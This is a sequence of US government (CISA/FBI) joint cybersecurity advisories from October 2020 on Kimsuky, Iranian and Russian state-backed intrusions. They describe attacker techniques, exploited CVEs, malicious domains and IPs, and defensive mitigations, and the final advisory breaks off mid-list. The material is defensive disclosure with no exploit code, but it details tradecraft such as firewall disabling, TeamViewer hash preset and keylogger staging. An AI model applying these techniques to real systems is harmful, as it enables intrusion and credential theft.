  • Kimsuky used actor-modified versions of PHProxy, an open-source web proxy written in PHP, to examine web traffic between the victim and the website accessed by the victims and to collect any credentials entered by the victim.[54]
Discovery

Kimsuky enumerates system information and the file structure for victims’ computers and networks (Discovery [TA0007]). Kimsuky appears to rely on using the victim’s operating system command prompt to enumerate the file structure and system information (File and Directory Discovery [T1083]). The information is directed to C:\WINDOWS\msdatl3.inc, read by malware, and likely emailed to the malware’s command server.[55]

Collection

Kimsuky collects data from the victim system through its HWP document malware and its keylogger (Collection [TA0009]). The HWP document malware changes the default program association in the Registry to open HWP documents (Event Triggered Execution: Change Default File Association [T1546.001]). When a user opens an HWP file, the Registry key change triggers the execution of malware that opens the HWP document and then sends a copy of the HWP document to an account under the adversary’s control. The malware then allows the user to open the file as normal without any indication to the user that anything has occurred. The keylogger intercepts keystrokes and writes them to C:\Program Files\Common Files\System\Ole DB\msolui80.inc and records the active window name where the user pressed keys (Input Capture: Keylogging [T1056.001]). There is another keylogger variant that logs keystrokes into C:\WINDOWS\setup.log.[56]

Kimsuky has also used a Mac OS Python implant that gathers data from Mac OS systems and sends it to a C2 server (Command and Scripting Interpreter: Python [T1059.006]). The Python program downloads various implants based on C2 options specified after the filedown.php (see figure 4).

Figure 4: Python Script targeting MacOS [57]

Command and Control

Kimsuky has used a modified TeamViewer client, version 5.0.9104, for Command and Control [TA0011] (Remote Access Software [T1219]). During the initial infection, the service “Remote Access Service” is created and adjusted to execute C:\Windows\System32\vcmon.exe at system startup (Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder [T1547.001]). Every time vcmon.exe is executed, it disables the firewall by zeroing out Registry values (Impair Defenses: Disable or Modify System Firewall [T1562.004]). The program then modifies the TeamViewer Registry settings by changing the TeamViewer strings in TeamViewer components. The launcher then configures several Registry values, including SecurityPasswordAES, that control how the remote access tool will work. The SecurityPasswordAES Registry value represents a hash of the password used by a remote user to connect to TeamViewer Client (Use Alternate Authentication Material: Pass the Hash [T1550.002]). This way, the attackers set a pre-shared authentication value to have access to the TeamViewer Client. The attacker will then execute the TeamViewer client netsvcs.exe.[58]

Kimsuky has been using a consistent format. In the URL used recently—express.php?op=1—there appears to be an option range from 1 to 3.[59]

Exfiltration

Open-source reporting from cybersecurity companies describes two different methods Kimsuky has used to exfiltrate stolen data: via email or through an RC4 key generated as an MD5 hash or a randomly generated 117-bytes buffer (Exfiltration [TA0010]).

There was no indication that the actor destroyed computers during the observed exfiltrations, suggesting Kimsuky’s intention is to steal information, not to disrupt computer networks. Kimsuky’s preferred method for sending or receiving exfiltrated information is through email, with their malware on the victim machine encrypting the data before sending it to a C2 server (Archive Collected Data [T1560]).  Kimsuky also sets up auto-forward rules within a victim’s email account (Email Collection: Email Forwarding Rule [T1114.003]).

Kimsuky also uses an RC4 key generated as an MD5 hash or a randomly generated 117-bytes buffer to exfiltrate stolen data. The data is sent RSA-encrypted (Encrypted Channel: Symmetric Cryptography [T1573.001]). Kimsuky’s malware constructs an 1120-bit public key and uses it to encrypt the 117-bytes buffer. The resulting data file is saved in C:\Program Files\Common Files\System\Ole DB\ (Data Staged: Local Data Staging [T1074.001]).[60]

MitigationsIndicators of Compromise

Kimsuky has used the domains listed in table 1 to carry out its objectives:

For a downloadable copy of IOCs, see AA20-301A.stix.

Table 1: Domains used by Kimsuky

login.bignaver.com

nytimes.onekma.com

webuserinfo.com

member.navier.pe.hu

nid.naver.onektx.com

pro-navor.com

cloudnaver.com

read.tongilmoney.com

naver.pw

resetprofile.com

nid.naver.unicrefia.com

daurn.org

servicenidnaver.com

mail.unifsc.com

naver.com.de

account.daurn.pe.hu

member.daum.unikortv.com

ns.onekorea.me

login.daum.unikortv.com

securetymail.com

riaver.site

account.daum.unikortv.com

help-navers.com

mailsnaver.com

daum.unikortv.com

beyondparallel.sslport.work

cloudmail.cloud

member.daum.uniex.kr

comment.poulsen.work

helpnaver.com

jonga.ml

impression.poulsen.work

view-naver.com

myaccounts.gmail.kr-infos.com

statement.poulsen.work

view-hanmail.net

naver.hol.es

demand.poulsen.work

login.daum.net-accounts.info

dept-dr.lab.hol.es

sankei.sslport.work

read-hanmail.net

Daurn.pe.hu

sts.desk-top.work

net.tm.ro

Bigfile.pe.hu

hogy.desk-top.work

daum.net.pl

Cdaum.pe.hu

kooo.gq

usernaver.com

eastsea.or.kr

tiosuaking.com

naver.com.ec

myaccount.nkaac.net

help.unikoreas.kr

naver.com.mx

naver.koreagov.com

resultview.com

naver.com.se

naver.onegov.com

account.daum.unikftc.kr

naver.com.cm

member-authorize.com

ww-naver.com

nid.naver.com.se

naver.unibok.kr

vilene.desk-top.work

csnaver.com

nid.naver.unibok.kr

amberalexander.ghtdev.com

nidnaver.email

read-naver.com

nidnaver.net

cooper.center

dubai-1.com

coinone.co.in

nidlogin.naver.corper.be

amberalexander.ghtdev.com

naver.com.pl

nid.naver.corper.be

gloole.net

naver.cx

naverdns.co

smtper.org

smtper.cz

naver.co.in

login.daum.kcrct.ml

myetherwallet.com.mx

downloadman06.com

login.outlook.kcrct.ml

myetherwallet.co.in

loadmanager07.com

top.naver.onekda.com

com-download.work

com-option.work

com-sslnet.work

com-vps.work

com-ssl.work

desk-top.work

intemet.work

jp-ssl.work

org-vip.work

sslport.work

sslserver.work

ssltop.work

taplist.work

vpstop.work

webmain.work

preview.manage.org-view.work

intranet.ohchr.account-protect.work

 

Table 2: Redacted domains used by Kimsuky

[REDACTED]/home/dwn.php?van=101

[REDACTED]/home/dwn.php?v%20an=101

[REDACTED]/home/dwn.php?van=102

[REDACTED]/home/up.php?id=NQDPDE

[REDACTED]/test/Update.php?wShell=201

 

Contact Information

To report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at www.fbi.gov/contact-us/field, or the FBI’s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by e-mail at CyWatch@fbi.gov. When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. To request incident response resources or technical assistance related to these threats, contact CISA at Central@cisa.dhs.gov.

  DISCLAIMER  

This information is provided "as is" for informational purposes only. The United States Government does not provide any warranties of any kind regarding this information. In no event shall the United States Government or its contractors or subcontractors be liable for any damages, including but not limited to, direct, indirect, special or consequential damages, arising out of, resulting from, or in any way connected with this information, whether or not based upon warranty, contract, tort, or otherwise, whether or not arising out of negligence, and whether or not injury was sustained from, or arose out of the results of, or reliance upon the information.

The United States Government does not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply their endorsement, recommendation, or favoring by the United States Government.

References Revisions
  • October 27, 2020: Initial Version

This product is provided subject to this Notification and this Privacy & Use policy.

2020. október 22.

AA20-296B: Iranian Advanced Persistent Threat Actors Threaten Election-Related Systems

Original release date: October 22, 2020
Summary

The Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) are warning that Iranian advanced persistent threat (APT) actors are likely intent on influencing and interfering with the U.S. elections to sow discord among voters and undermine public confidence in the U.S. electoral process.

The APT actors are creating fictitious media sites and spoofing legitimate media sites to spread obtained U.S. voter-registration data, anti-American propaganda, and misinformation about voter suppression, voter fraud, and ballot fraud.

The APT actors have historically exploited critical vulnerabilities to conduct distributed denial-of-service (DDoS) attacks, structured query language (SQL) injections attacks, spear-phishing campaigns, website defacements, and disinformation campaigns. 

Click here for a PDF version of this report.

Technical Details

These actors have conducted a significant number of intrusions against U.S.-based networks since August 2019. The actors leveraged several Common Vulnerabilities and Exposures (CVEs)—notably CVE-2020-5902 and CVE-2017-9248—pertaining to virtual private networks (VPNs) and content management systems (CMSs). 

  • CVE-2020-5902 affects F5 VPNs. Remote attackers could exploit this vulnerability to execute arbitrary code. [1].
  • CVE-2017-9248 affects Telerik UI. Attackers could exploit this vulnerability in web applications using Telerik UI for ASP.NET AJAX to conduct cross-site scripting (XSS) attacks.[2]

Historically, these actors have conducted DDoS attacks, SQL injections attacks, spear-phishing campaigns, website defacements, and disinformation campaigns. These activities could render these systems temporarily inaccessible to the public or election officials, which could slow, but would not prevent, voting or the reporting of results.

  • A DDoS attack could slow or render election-related public-facing websites inaccessible by flooding the internet-accessible server with requests; this would prevent users from accessing online resources, such as voting information or non-official voting results. In the past, cyber actors have falsely claimed DDoS attacks have compromised the integrity of voting systems in an effort to mislead the public that their attack would prevent a voter from casting a ballot or change votes already cast.
  • A SQL injection involves a threat actor inserting malicious code into the entry field of an application, causing that code to execute if entries have not been sanitized. SQL injections are among the most dangerous and common exploits affecting websites. A SQL injection into a media company’s CMS could enable a cyber actor access to network systems to manipulate content or falsify news reports prior to publication.
  • Spear-phishing messages may not be easily detectible. These emails often ask victims to fill out forms or verify information through links embedded in the email. APT actors use spear phishing to gain access to information—often credentials, such as passwords—and to identify follow-on victims. A malicious cyber actor could use compromised email access to spread disinformation to the victims’ contacts or collect information sent to or from the compromised account.
  • Public-facing website defacements typically involve a cyber threat actor compromising the website or its associated CMS, allowing the actor to upload images to the site’s landing page. In situations where such public-facing websites relate to elections (e.g., the website of a county board of elections), defacements could cast doubt on the security and legitimacy of the websites’ information. If cyber actors were able to successfully change an election-related website, the underlying data and internal systems would remain uncompromised..
  • Disinformation campaigns involve malign actions taken by foreign governments or actors designed to sow discord, manipulate public discourse, or discredit the electoral system. Malicious actors often use social media as well as fictitious and spoofed media sites for these campaigns. Based on their corporate policies, social media companies have worked to counter these actors’ use of their platforms to promote fictitious news stories by removing the news stories, and in many instances, closing the accounts related to the malicious activity. However, these adversaries will continue their attempts to create fictitious accounts that promote divisive storylines to sow discord, even after the election.
Mitigations

The following recommended mitigations list includes self-protection strategies against the cyber techniques used by the APT actors:

  • Validate input—input validation is a method of sanitizing untrusted input provided by web application users. Implementing input validation can protect against security flaws of web applications by significantly reducing the probability of successful exploitation. Types of attacks possibly prevented include SQL injection, XSS, and command injection.
  • Audit your network for systems using Remote Desktop Protocol (RDP) and other internet-facing services. Disable the service if unneeded or install available patches. Users may need to work with their technology vendors to confirm that patches will not affect system processes.
  • Verify all cloud-based virtual machine instances with a public IP; do not have open RDP ports, unless there is a valid business reason to do so. Place any system with an open RDP port behind a firewall, and require users to use a VPN to access it through the firewall.
  • Enable strong password requirements and account lockout policies to defend against brute-force attacks.
  • Apply multi-factor authentication, when possible.
  • Apply system and software updates regularly, particularly if you are deploying products affected by CVE-2020-5902 and CVE-2017-9248.
  • Maintain a good information back-up strategy that involves routinely backing up all critical data and system configuration information on a separate device. Store the backups offline; verify their integrity and restoration process.
  • Enable logging and ensure logging mechanisms capture RDP logins. Keep logs for a minimum of 90 days, and review them regularly to detect intrusion attempts.
  • When creating cloud-based virtual machines, adhere to the cloud provider's best practices for remote access.
  • Ensure third parties that require RDP access are required to follow internal policies on remote access.
  • Minimize network exposure for all control system devices. Where possible, critical devices should not have RDP enabled.
  • Regulate and limit external to internal RDP connections. When external access to internal resources is required, use secure methods, such as VPNs, recognizing VPNs are only as secure as the connected devices.
  • Be aware of unsolicited contact on social media from any individual you do not know.
  • Be aware of attempts to pass links or files via social media from anyone you do not know.
  • Be aware of unsolicited requests to share a file via online services.
  • Be aware of email messages conveying suspicious alerts or other online accounts, including login notifications from foreign countries or other alerts indicating attempted unauthorized access to your accounts.
  • Be suspicious of emails purporting to be from legitimate online services (e.g., the images in the email appear to be slightly pixelated and/or grainy, language in the email seems off, the email originates from an IP address not attributable to the provider/company).
  • Be suspicious of unsolicited email messages that contain shortened links (e.g., via tinyurl, bit.ly).
  • Use security features provided by social media platforms, use strong passwords, change passwords frequently, and use a different password for each social media account.
  • See CISA’s Tip on Best Practices for Securing Election Systems for more information.
General Mitigations Keep applications and systems updated and patched

Apply all available software updates and patches; automate this process to the greatest extent possible (e.g., by using an update service provided directly from the vendor). Automating updates and patches is critical because of the speed at which threat actors create exploits after a patch is released. These “N-day” exploits can be as damaging as a zero-day exploits. Vendor updates must also be authentic; updates are typically signed and delivered over protected links to ensure the integrity of the content. Without rapid and thorough patch application, threat actors can operate inside a defender’s patch cycle.[3] In addition to updating the application, use tools (e.g., the OWASP Dependency-Check Project tool[4]) to identify publicly known vulnerabilities in third-party libraries that the application depends on.

Scan web applications for SQL injection and other common web vulnerabilities

Implement a plan to scan public-facing web servers for common web vulnerabilities (SQL injection, cross-site scripting, etc.); use a commercial web application vulnerability scanner in combination with a source code scanner.[5] As vulnerabilities are found, they should be fixed or patched. This is especially crucial for networks that host older web applications; as sites get older, more vulnerabilities are discovered and exposed.

Deploy a web application firewall 

Deploy a web application firewall (WAF) to help prevent invalid input attacks and other attacks destined for the web application. WAFs are intrusion/detection/prevention devices that inspect each web request made to and from the web application to determine if the request is malicious. Some WAFs install on the host system and others are dedicated devices that sit in front of the web application. WAFs also weaken the effectiveness of automated web vulnerability scanning tools.

Deploy techniques to protect against web shells

Patch web application vulnerabilities or fix configuration weaknesses that allow web shell attacks, and follow guidance on detecting and preventing web shell malware.[6] Malicious cyber actors often deploy web shells—software that can enable remote administration—on a victim’s web server. Malicious cyber actors can use web shells to execute arbitrary system commands, which are commonly sent over HTTP or HTTPS. Attackers often create web shells by adding or modifying a file in an existing web application. Web shells provide attackers with persistent access to a compromised network using communications channels disguised to blend in with legitimate traffic. Web shell malware is a long-standing, pervasive threat that continues to evade many security tools.

Use multi-factor authentication for administrator accounts

Prioritize protection for accounts with elevated privileges, with remote access, and/or used on high value assets.[7] Use physical token-based authentication systems to supplement knowledge-based factors such as passwords and personal identification numbers (PINs).[8] Organizations should migrate away from single-factor authentication, such as password-based systems, which are subject to poor user choices and more susceptible to credential theft, forgery, and password reuse across multiple systems.

Remediate critical web application security risks

First, identify and remedite critical web application security risks first; then, move on to other less critical vulnerabilities. Follow available guidance on securing web applications.[9],[10],[11]

How do I respond to unauthorized access to election-related systems? Implement your security incident response and business continuity plan

It may take time for your organization’s IT professionals to isolate and remove threats to your systems and restore normal operations. In the meantime, take steps to maintain your organization’s essential functions according to your business continuity plan. Organizations should maintain and regularly test backup plans, disaster recovery plans, and business continuity procedures.

Contact CISA or law enforcement immediately

To report an intrusion and to request incident response resources or technical assistance, contact CISA (Central@cisa.dhs.gov or 888-282-0870) or the Federal Bureau of Investigation (FBI) through a local field office or the FBI’s Cyber Division (CyWatch@ic.fbi.gov or 855-292-3937).

Resources Contact Information

To report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at www.fbi.gov/contact-us/field, or the FBI’s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by e-mail at CyWatch@fbi.gov. When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. To request incident response resources or technical assistance related to these threats, contact CISA at Central@cisa.dhs.gov.

References Revisions
  • October 22, 2020: Initial Version

This product is provided subject to this Notification and this Privacy & Use policy.

2020. október 22.

AA20-296A: Russian State-Sponsored Advanced Persistent Threat Actor Compromises U.S. Government Targets

Original release date: October 22, 2020
Summary

This joint cybersecurity advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK®) framework. See the ATT&CK for Enterprise framework for all referenced threat actor tactics and techniques

This joint cybersecurity advisory—written by the Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA)—provides information on Russian state-sponsored advanced persistent threat (APT) actor activity targeting various U.S. state, local, territorial, and tribal (SLTT) government networks, as well as aviation networks. This advisory updates joint CISA-FBI cybersecurity advisory AA20-283A: APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations.

Since at least September 2020, a Russian state-sponsored APT actor—known variously as Berserk Bear, Energetic Bear, TeamSpy, Dragonfly, Havex, Crouching Yeti, and Koala in open-source reporting—has conducted a campaign against a wide variety of U.S. targets. The Russian state-sponsored APT actor has targeted dozens of SLTT government and aviation networks, attempted intrusions at several SLTT organizations, successfully compromised network infrastructure, and as of October 1, 2020, exfiltrated data from at least two victim servers.

The Russian-sponsored APT actor is obtaining user and administrator credentials to establish initial access, enable lateral movement once inside the network, and locate high value assets in order to exfiltrate data. In at least one compromise, the APT actor laterally traversed an SLTT victim network and accessed documents related to:

  • Sensitive network configurations and passwords.
  • Standard operating procedures (SOP), such as enrolling in multi-factor authentication (MFA).
  • IT instructions, such as requesting password resets.
  • Vendors and purchasing information.
  • Printing access badges.

To date, the FBI and CISA have no information to indicate this APT actor has intentionally disrupted any aviation, education, elections, or government operations. However, the actor may be seeking access to obtain future disruption options, to influence U.S. policies and actions, or to delegitimize SLTT government entities.

As this recent malicious activity has been directed at SLTT government networks, there may be some risk to elections information housed on SLTT government networks. However, the FBI and CISA have no evidence to date that integrity of elections data has been compromised. Due to the heightened awareness surrounding elections infrastructure and the targeting of SLTT government networks, the FBI and CISA will continue to monitor this activity and its proximity to elections infrastructure.

  • Click here for a PDF version of this report.
  • Click here for a STIX package of IOCs.
Technical Details

The FBI and CISA have observed Russian state-sponsored APT actor activity targeting U.S. SLTT government networks, as well as aviation networks. The APT actor is using Turkish IP addresses 213.74.101[.]65, 213.74.139[.]196, and 212.252.30[.]170 to connect to victim web servers (Exploit Public Facing Application [T1190]).

The actor is using 213.74.101[.]65 and 213.74.139[.]196 to attempt brute force logins and, in several instances, attempted Structured Query Language (SQL) injections on victim websites (Brute Force [T1110]; Exploit Public Facing Application [T1190]). The APT actor also hosted malicious domains, including possible aviation sector target columbusairports.microsoftonline[.]host, which resolved to 108.177.235[.]92 and [cityname].westus2.cloudapp.azure.com; these domains are U.S. registered and are likely SLTT government targets (Drive-By Compromise [T1189]).

The APT actor scanned for vulnerable Citrix and Microsoft Exchange services and identified vulnerable systems, likely for future exploitation. This actor continues to exploit a Citrix Directory Traversal Bug (CVE-2019-19781) and a Microsoft Exchange remote code execution flaw (CVE-2020-0688).

The APT actor has been observed using Cisco AnyConnect Secure Socket Layer (SSL) virtual private network (VPN) connections to enable remote logins on at least one victim network, possibly enabled by an Exim Simple Mail Transfer Protocol (SMTP) vulnerability (CVE 2019-10149) (External Remote Services [T1133]). More recently, the APT actor enumerated and exploited a Fortinet VPN vulnerability (CVE-2018-13379) for Initial Access [TA0001] and a Windows Netlogon vulnerability (CVE-2020-1472) to obtain access to Windows Active Directory (AD) servers for Privilege Escalation [TA0004] within the network (Valid Accounts [T1078]). These vulnerabilities can also be leveraged to compromise other devices on the network (Lateral Movement [TA0008]) and to maintain Persistence [TA0003]).

Between early February and mid-September, these APT actors used 213.74.101[.]65, 212.252.30[.]170, 5.196.167[.]184, 37.139.7[.]16, 149.56.20[.]55, 91.227.68[.]97, and 5.45.119[.]124 to target U.S. SLTT government networks. Successful authentications—including the compromise of Microsoft Office 365 (O365) accounts—have been observed on at least one victim network (Valid Accounts [T1078]).

MitigationsIndicators of Compromise

The APT actor used the following IP addresses and domains to carry out its objectives:

  • 213.74.101[.]65
  • 213.74.139[.]196
  • 212.252.30[.]170
  • 5.196.167[.]184
  • 37.139.7[.]16
  • 149.56.20[.]55
  • 91.227.68[.]97
  • 138.201.186[.]43
  • 5.45.119[.]124
  • 193.37.212[.]43
  • 146.0.77[.]60
  • 51.159.28[.]101
  • columbusairports.microsoftonline[.]host
  • microsoftonline[.]host
  • email.microsoftonline[.]services
  • microsoftonline[.]services
  • cityname[.]westus2.cloudapp.azure.com

IP address 51.159.28[.]101 appears to have been configured to receive stolen Windows New Technology Local Area Network Manager (NTLM) credentials. FBI and CISA recommend organizations take defensive actions to mitigate the risk of leaking NTLM credentials; specifically, organizations should disable NTLM or restrict outgoing NTLM. Organizations should consider blocking IP address 51.159.28[.]101 (although this action alone may not mitigate the threat, as the APT actor has likely established, or will establish, additional infrastructure points).

Organizations should check available logs for traffic to/from IP address 51.159.28[.]101 for indications of credential-harvesting activity. As the APT actors likely have—or will—establish additional infrastructure points, organizations should also monitor for Server Message Block (SMB) or WebDAV activity leaving the network to other IP addresses.

Refer to AA20-296A.stix for a downloadable copy of IOCs.

Network Defense-in-Depth

Proper network defense-in-depth and adherence to information security best practices can assist in mitigating the threat and reducing the risk to critical infrastructure. The following guidance may assist organizations in developing network defense procedures.

  • Keep all applications updated according to vendor recommendations, and especially prioritize updates for external facing applications and remote access services to address CVE-2019-19781, CVE-2020-0688, CVE 2019-10149, CVE-2018-13379, and CVE-2020-1472. Refer to table 1 for patch information on these CVEs.

Table 1: Patch information for CVEs

Vulnerability Vulnerable Products Patch Information CVE-2019-19781
  • Citrix Application Delivery Controller
  • Citrix Gateway
  • Citrix SDWAN WANOP

 

Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway versions 11.1 and 12.0

Citrix blog post: security updates for Citrix SD-WAN WANOP release 10.2.6 and 11.0.3

Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway versions 12.1 and 13.0

Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway version 10.5

CVE-2020-0688
  • Microsoft Exchange Server 2010 Service Pack 3 Update Rollup 30
  • Microsoft Exchange Server 2013 Cumulative Update 23
  • Microsoft Exchange Server 2016 Cumulative Update 14
  • Microsoft Exchange Server 2016 Cumulative Update 15
  • Microsoft Exchange Server 2019 Cumulative Update 3
  • Microsoft Exchange Server 2019 Cumulative Update 4

 

Microsoft Security Advisory for CVE-2020-0688 CVE-2019-10149
  • Exim versions 4.87–4.91
Exim page for CVE-2019-10149 CVE-2018-13379
  • FortiOS 6.0: 6.0.0 to 6.0.4
  • FortiOS 5.6: 5.6.3 to 5.6.7
  • FortiOS 5.4: 5.4.6 to 5.4.12
Fortinet Security Advisory: FG-IR-18-384 CVE-2020-1472
  • Windows Server 2008 R2 for x64-based Systems Service Pack 1
  • Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
  • Windows Server 2012
  • Windows Server 2012 (Server Core installation)
  • Windows Server 2012 R2
  • Windows Server 2016
  • Windows Server 2019
  • Windows Server 2019 (Server Core installation)
  • Windows Server, version 1903  (Server Core installation)
  • Windows Server, version 1909  (Server Core installation)
  • Windows Server, version 2004   (Server Core installation)

Microsoft Security Advisory for CVE-2020-1472

 

 

  • Follow Microsoft’s guidance on monitoring logs for activity related to the Netlogon vulnerability, CVE-2020-1472.
  • If appropriate for your organization’s network, prevent external communication of all versions of SMB and related protocols at the network boundary by blocking Transmission Control Protocol (TCP) ports 139 and 445 and User Datagram Protocol (UDP) port 137. See the CISA publication on SMB Security Best Practices for more information.
  • Implement the prevention, detection, and mitigation strategies outlined in:
  • Isolate external facing services in a network demilitarized zone (DMZ) since they are more exposed to malicious activity; enable robust logging, and monitor the logs for signs of compromise.
  • Establish a training mechanism to inform end users on proper email and web usage, highlighting current information and analysis and including common indicators of phishing. End users should have clear instructions on how to report unusual or suspicious emails.
  • Implement application controls to only allow execution from specified application directories. System administrators may implement this through Microsoft Software Restriction Policy, AppLocker, or similar software. Safe defaults allow applications to run from PROGRAMFILES, PROGRAMFILES(X86), and WINDOWS folders. All other locations should be disallowed unless an exception is granted.
  • Block Remote Desktop Protocol (RDP) connections originating from untrusted external addresses unless an exception exists; routinely review exceptions on a regular basis for validity.
Comprehensive Account Resets

For accounts where NTLM password hashes or Kerberos tickets may have been compromised (e.g., through CVE-2020-1472), a double-password-reset may be required in order to prevent continued exploitation of those accounts. For domain-admin-level credentials, a reset of KRB-TGT “Golden Tickets” may be required, and Microsoft has released specialized guidance for this. Such a reset should be performed very carefully if needed.

If there is an observation of CVE-2020-1472 Netlogon activity or other indications of valid credential abuse, it should be assumed the APT actors have compromised AD administrative accounts. In such cases, the AD forest should not be fully trusted, and, therefore, a new forest should be deployed. Existing hosts from the old compromised forest cannot be migrated in without being rebuilt and rejoined to the new domain, but migration may be done through “creative destruction,” wherein, as endpoints in the legacy forest are decommissioned, new ones can be built in the new forest. This will need to be completed in on-premise—as well as in Azure-hosted—AD instances.

Note that fully resetting an AD forest is difficult and complex; it is best done with the assistance of personnel who have successfully completed the task previously.

It is critical to perform a full password reset on all user and computer accounts in the AD forest. Use the following steps as a guide.

  1. Create a temporary administrator account, and use this account only for all administrative actions
  2. Reset the Kerberos Ticket Granting Ticket (krbtgt) password;[1] this must be completed before any additional actions (a second reset will take place in step 5)
  3. Wait for the krbtgt reset to propagate to all domain controllers (time may vary)
  4.  Reset all account passwords (passwords should be 15 characters or more and randomly assigned):
    1. User accounts (forced reset with no legacy password reuse)
    2. Local accounts on hosts (including local accounts not covered by Local Administrator Password Solution [LAPS])
    3. Service accounts
    4. Directory Services Restore Mode (DSRM) account
    5. Domain Controller machine account
    6. Application passwords
  5. Reset the krbtgt password again
  6. Wait for the krbtgt reset to propagate to all domain controllers (time may vary)
  7. Reboot domain controllers
  8. Reboot all endpoints

The following accounts should be reset:

  • AD Kerberos Authentication Master (2x)
  • All Active Directory Accounts
  • All Active Directory Admin Accounts
  • All Active Directory Service Accounts
  • All Active Directory User Accounts
  • DSRM Account on Domain Controllers
  • Non-AD Privileged Application Accounts
  • Non-AD Unprivileged Application Accounts
  • Non-Windows Privileged Accounts
  • Non-Windows User Accounts
  • Windows Computer Accounts
  • Windows Local Admin
VPN Vulnerabilities

Implement the following recommendations to secure your organization’s VPNs:

  • Update VPNs, network infrastructure devices, and devices being used to remote into work environments with the latest software patches and security configurations. See CISA Tips Understanding Patches and Software Updates and Securing Network Infrastructure Devices. Wherever possible, enable automatic updates.
  • Implement MFA on all VPN connections to increase security. Physical security tokens are the most secure form of MFA, followed by authenticator app-based MFA. SMS and email-based MFA should only be used when no other forms are available. If MFA is not implemented, require teleworkers to use strong passwords. See CISA Tips Choosing and Protecting Passwords and Supplementing Passwords for more information.

Discontinue unused VPN servers. Reduce your organization’s attack surface by discontinuing unused VPN servers, which may act as a point of entry for attackers. To protect your organization against VPN vulnerabilities:

  • Audit configuration and patch management programs.
  • Monitor network traffic for unexpected and unapproved protocols, especially outbound to the Internet (e.g., Secure Shell [SSH], SMB, RDP).
  • Implement MFA, especially for privileged accounts.
  • Use separate administrative accounts on separate administration workstations.
  • Keep software up to date. Enable automatic updates, if available.
Contact Information

To report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at www.fbi.gov/contact-us/field, or the FBI’s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by e-mail at CyWatch@fbi.gov. When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. To request incident response resources or technical assistance related to these threats, contact CISA at Central@cisa.dhs.gov.

Resources   DISCLAIMER  

This information is provided "as is" for informational purposes only. The United States Government does not provide any warranties of any kind regarding this information. In no event shall the United States Government or its contractors or subcontractors be liable for any damages, including but not limited to, direct, indirect, special or consequential damages, arising out of, resulting from, or in any way connected with this information, whether or not based upon warranty, contract, tort, or otherwise, whether or not arising out of negligence, and whether or not injury was sustained from, or arose out of the results of, or reliance upon the information.

The United States Government does not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply their endorsement, recommendation, or favoring by the United States Government.

References Revisions
  • October 22, 2020: Initial Version

This product is provided subject to this Notification and this Privacy & Use policy.

2020. október 9.

AA20-283A: APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations

Original release date: October 9, 2020
Summary

This joint cybersecurity advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK®) framework. See the ATT&CK for Enterprise framework for all referenced threat actor techniques.

Note: the analysis in this joint cybersecurity advisory is ongoing, and the information provided should not be considered comprehensive. The Cybersecurity and Infrastructure Security Agency (CISA) will update this advisory as new information is available.

This joint cybersecurity advisory was written by CISA with contributions from the Federal Bureau of Investigation (FBI). 

CISA has recently observed advanced persistent threat (APT) actors exploiting multiple legacy vulnerabilities in combination with a newer privilege escalation vulnerability—CVE-2020-1472—in Windows Netlogon. The commonly used tactic, known as vulnerability chaining, exploits multiple vulnerabilities in the course of a single intrusion to compromise a network or application. 

This recent malicious activity has often, but not exclusively, been directed at federal and state, local, tribal, and territorial (SLTT) government networks. Although it does not appear these targets are being selected because of their proximity to elections information, there may be some risk to elections information housed on government networks.

CISA is aware of some instances where this activity resulted in unauthorized access to elections support systems; however, CISA has no evidence to date that integrity of elections data has been compromised. There are steps that election officials, their supporting SLTT IT staff, and vendors can take to help defend against this malicious cyber activity.

Some common tactics, techniques, and procedures used by APT actors include leveraging legacy network access and virtual private network (VPN) vulnerabilities in association with the recent critical CVE-2020-1472 Netlogon vulnerability. CISA is aware of multiple cases where the Fortinet FortiOS Secure Socket Layer (SSL) VPN vulnerability CVE-2018-13379 has been exploited to gain access to networks. To a lesser extent, CISA has also observed threat actors exploiting the MobileIron vulnerability CVE-2020-15505. While these exploits have been observed recently, this activity is ongoing and still unfolding. CISA recommends network staff and administrators review internet-facing infrastructure for vulnerabilities, including Juniper CVE-2020-1631, Pulse Secure CVE-2019-11510,  Citrix NetScaler CVE-2020-19781, and Palo Alto Networks CVE-2020-2021 (this list is not considered exhaustive).

After gaining initial access, the actors exploit CVE-2020-1472 to compromise all Active Directory (AD) identity services. Actors have then been observed using legitimate remote access tools, such as VPN and Remote Desktop Protocol (RDP), to access the environment with the compromised credentials. Observed activity targets multiple sectors, and is not limited to SLTT entities.

Click here for a PDF version of this report.

Technical DetailsInitial Access

APT threat actors are actively leveraging legacy vulnerabilities in internet-facing infrastructure (Exploit Public-Facing Application [T1190], External Remote Services [T1133]) to gain initial access into systems. The APT actors appear to have predominately gained initial access via the Fortinet FortiOS VPN vulnerability CVE-2018-13379; however, other vulnerabilities, listed below, have been observed (as analysis is evolving, these listed vulnerabilities should not be considered comprehensive).

  • Citrix NetScaler CVE-2020-19781
  • MobileIron CVE-2020-15505
